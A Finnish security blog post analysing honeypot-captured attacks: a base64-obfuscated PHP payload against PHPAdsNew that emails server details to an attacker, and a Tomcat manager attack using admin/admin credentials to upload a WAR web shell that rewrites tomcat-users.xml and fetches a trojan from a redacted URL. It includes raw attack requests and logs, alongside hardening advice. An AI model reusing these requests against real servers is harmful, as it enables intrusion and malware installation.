Jätämme tästä esimerkistä pois tarkan URLin, jota hyökkääjä kokeili, mutta yleisellä tasolla todettakoon että hyökkääjä yritti etsiä haavoittuvaa PHPAdsNew-asennusta.

Latasimme hyökkääjän lähettämästä osoitteesta itse hyökkäyksessä käytetyn tiedoston:

Ylläolevasta kuvasta näkee suhteellisen helposti että kyseessä BASE64-koodattu tiedosto, joka dekoodauksen jälkeen suoritetaan normaalisti eval()-funktion avulla. Alla olevassa kuvassa on dekoodauksen jälkeen näkyville tuleva hyökkäyskoodi:

Kuten huomaamme, koodi sisältä vielä pienen pätkän BASE64-koodattua tietoa, mutta katsotaan ensin mitä hyökkäyskoodi tekee yleisellä tasolla. Hyökkäyskoodi kerää muutamia hyödyllisiä tietoja PHP-ympäristön muuttujista kuten palvelimen nimen ja tiedon siitä onko PHP:n “Safe Mode” aktivoitu vai ei. Nämä tiedot, kuten myös hyväksikäytetyn osoitteen hyökkäyskoodi lähettää sähköpostilla eteenpäin. Vastaanottajan osoite on jäljellä olevassa BASE64-koodatussa tekstinpätkässä:

fr33sh3ll@gmail.com

Joka kerta kun hyökkäyskoodi onnistutaan ajamaan kohdekoneessa saa koodin tekijä sähköpostilla ilmoituksen joka sisältää haavoittuvan palvelimen osoitteen ja tarkan URL-osoitteen haavoittuvaan PHPAdsNew-asennukseen. Tällä tavoin hyökkääjä voi myöhemmin halutessaan käyttää haavoittuvuutta uudelleen hyväkseen ja ajaa kohdekoneessa haluamaansa koodia.

On olemassa useita hyviksi havaittuja ja suositeltuja keinoja hankaloittaa tällaisten hyökkäysten toimintaa kuten asettamalla PHP-tulkissa “Safe Mode” vaihtoehto päälle, tai ottaa allow_url_open tai allow_url_include (riippuu käytössä olevan PHP-kielen versiosta) pois päältä. Enemmän hyviä ohjeita ja vinkkejä PHP-asennusten koventamiseen löytyy esimerkiksi näiltä sivuilta:

There are several ways to make such attacks much harder to perform, like turning on the safe mode or toggling off the allow_url_fopen or allow_url_include (in some versions of php). More good/better tricks can be found for example on these two sites:

http://www.madirish.net/?article=229

http://www.hardened-php.net/

Aineistot kerätään oikeilta, ainoastaan tätä tarkoitusta varten pystytetyiltä koneilta jotka ovat ainoastaan kyseisen testin ajan toiminnassa ja jatkuvan valvonnan alaisena. Näin voidaan varmistua siitä ettei hyökkääjät pääse käyttämään järjestelmiämme hyväksi muiden tietokoneiden saastuttamisessa.

Käyttämämme tietojärjestelmät on rakennettu siten, ettei hyökkääjä voi havaita olevansa tarkkailun alla.

Fri Mar 25 00:30:31 EET 2009 – /190.210.x.x:3625 -

GET /manager/html HTTP/1.1
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

Hyökkääjät yrittävät etsiä Tomcat-sovelluspalvelinasennuksia, joiden ylläpitosovellus on käytössä siten, että ylläpitäjän käyttäjätunnus ja salasala on ‘admin’. Sen sijaan että olisimme pystyttäneet niin sanotun low interaction hunajapurkin päätimme asentaa oikean Tomcat-palvelimen koneelle joka on jatkuvan seurannan alla. Noin vuorokauden seurannan jälkeen näimme hyökkäävän koneen käyvän palvelimella:

190.26.x.x – admin [26/Mar/2009:21:32:13 -0000] “GET /manager/html HTTP/1.1″ 200 8714
190.26.x.x – admin [26/Mar/2009:21:32:13 -0000] “POST /manager/html/upload HTTP/1.0″ 200 8747
190.26.x.x – - [26/Mar/2009:21:32:15 -0000] “GET /killfexcepshell/index.jsp HTTP/1.1″ 404 763
190.26.x.x – admin [26/Mar/2009:21:32:38 -0000] “POST /manager/html/upload HTTP/1.0″ 200 9377
190.26.x.x – - [26/Mar/2009:21:32:43 -0000] “GET /killfexcepshell/index.jsp HTTP/1.1″ 200 48

Ylläolevasta lokista voidaan nähdä, että tunnistettuaan hyväksikäytettävän palvelimen hyökkääjä lataa sinne omaa koodiaan:

POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=—————————032509203251046
Content-Length: 2495
Host: x.x.x.x:8080
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=
—————————–032509203251046
Content-Disposition: form-data; name=”deployWar”; filename=”C:\WINDOWS\system32\mui\fexcep\killfexcepshell.war”
Content-Type: application/x-zip-compressed

Hyökkääjä latasi palvelimelle killfexcepshell.war-tiedoston. WAR-tiedostot (Web ARchive) ovat pakattuja tiedostoja joita Tomcat-palvelinsovellus käyttää uusien verkkosovellusten asentamiseen:

Kuten tarkkasilmäiset huomasivat, ylläoleva POST-pyyntö on todennäköisimmin tehty Windows-käyttöjärjestelmällä toimivasta palvelimesta. Huomasimme myös, että vaikka hyökkäävän koneen IP-osoite on Kolumbiassa niin itse pyynnön otsikkotiedoissa kieleksi ilmoitetaan ‘zh-cn’, joka viittaa Kiinaan. Tämä arvo on todennäköisesti haittaohjelman itsensä asettama. Toinen mielenkiintoinen huomio oli se, että hyökkäävä kone pyysi palvelimeltamme myös .gif -kuvatiedostoja joihin on linkitetty Tomcatin ylläpitosovelluksessa. Tämä viittaisi siihen että haittaohjelma käyttää skannaamiseen käyttäjältä piilotettua Internet Explorer-ikkunaa.

Onnistuneen asennuksen jälkeen palvelin sai vain yhden pyynnön hyökkäävältä koneelta: GET /killfexcepshell/index.jsp.

Tässä pyynnön tarkat tiedot:

GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<poistettu>.cn/tomcat.exe

Ja tämä on vastaus:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=26482330DBFE986AC0705B4691E0C66D; Path=/killfexcepshell
Content-Type: text/html;charset=utf-8
Content-Length: 48
Date: Thu, 26 Mar 2009 01:32:43 GMT
Connection: close

Failure!Because Remote computer system is Linux!

Cache-Vip-URL? Tämä ei ainakaan ole mikään tunnettu HTTP-otsake. URL osoittaa kiinalaisella www-palvelimella olevaan tiedostoon. Tutkimme index.jsp:n toimintaa tarkemmin, ja tässä päätoiminnallisuus:

• sivu ylikirjoittaa tomcat-users.xml:ssä olevat käyttäjätunnus/salasanaparit alla olevalla tiedolla:

<?xml version=’1.0′ encoding=’utf-8′?>
<tomcat-users>
<role rolename=”tomcat”/>
<role rolename=”role1″ />
<role rolename=”manager”/>
<role rolename=”admin”/>
<user username=”admin” password=”<hidden>” roles=”admin,manager”/>
</tomcat-users>

Tällä muutoksella hyökkääjä toivoo estävänsä muita hyödyntämästä heikkoja salasanoja. Samalla kuitenkin palvelimen laillinen etäylläpito estyy kunnes tunnukset on palautettu.

• index.jsp lataa Cache-Vip-Url otsakkeen osoittamasta paikasta käynnistettävän binääritiedoston. Kuten huomaatte vastauksesta tämä toimii ainoastaan Windows-käyttöjärjestelmiin asennetuissa Tomcat-ohjelmistoissa. Hyökkääjä voi tosin halutessaan tulla myöhemmin uudestaan asentamaan jonkin muissa käyttöjärjestelmissä toimivan haittaohjelman.

Poistimme ylläolevasta tomcat-users.xml-tiedostosta sinne haittaohjelman asettaman salasanan. Vaikka hyökkääjillä on ollut tarkoitus luoda siihen satunnainen salasana niin haittaohjelmassa olevan ohjelmointivirheen takia asetettu salasana on kaikissa sama, emmekä halua aiheuttaa enempää riskejä jo saastuneille koneille.

Kiinalaisesta verkko-osoitteesta ladattu haittaohjelma on yleisesti tunnistettu PcClient-troijalaisen variantiksi joka ottaa yhteyttä vicp.net -domainin alla olevaan kiinassa sijaitsevaan alidomainiin TCP/126 porttiin. vicp.net on dynaamisia verkko-osoitteita tarjoava yritys.

Vaikka yleisimmin tiedotusvälineissä huomioidaan valtavirran ohjelmistojen hyväksikäyttöä on tämä hyvä esimerkki siitä, että haittaohjelmien levittäjät ja krakkerit pyrkivät käyttämään kaikkia mahdollisia hyökkäystapoja saavuttaakseen tavoitteensa. Tomcat-asennuksia skannataan vieläkin, vaikka Tomcat-ohjelmistossa ei ole enään moneen vuoteen ollut oletussalasanoja käytössä, vaan ylläpitosovellus on pitänyt kytkeä käsin käyttöön.

Pyrimme jatkamaan myös tulevaisuudessa erilaisten hyökkäysmekanismien esittelyjä. Jos lukijoilla on herännyt lisäkysymyksiä niin meille voi lähettää sähköpostia osoitteeseen info(a_t)fitsec.com, tai vaikkapa jättää tähän blogiviestiin kommentti.